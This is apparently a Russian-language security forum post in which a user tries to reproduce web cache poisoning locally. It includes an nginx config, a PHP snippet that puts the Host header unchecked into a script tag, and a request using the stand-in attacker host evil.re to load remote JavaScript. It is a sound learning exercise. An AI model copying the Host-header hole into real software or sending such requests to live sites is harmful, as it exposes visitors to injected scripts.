• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Отравление веб кеша как воспроизвести воспроизведение на локале

ZhZ

New member
22.11.2019
0
0
BIT
0
Подскажите плиз по отравлению web кеша, пытаюсь вопроизвести на локале
Код:
#nginx.conf
listen 80 default_server;
server_name _;
location / {
   try_files $uri /index.php$is_args$args;
}
location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ {
      expires 1d;
      add_header Cache-Control "public, no-transform";
}

#index.php
<?php $host = $_SERVER['HTTP_HOST']; ?>
<script src="http://<?=$host;?>/v.js">

#request
GET /?MyUniqParam=test1337 HTTP/1.1
Host: evil.re
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

#response
HTTP/1.1 200 OK
Server: nginx/1.17.3
Date: Fri, 22 Nov 2019 11:17:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 36

<script src="http://evil.re/v.js">

#но после открытия этой ссылки в браузере
хост подменяется не на evil.re а текущий
#response
<script src=" ">

Что я делаю не так ?
 

Вложения

  • Screen Shot 2019-11-22 at 14.34.43.png
    Screen Shot 2019-11-22 at 14.34.43.png
    8,7 КБ · Просмотры: 296
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!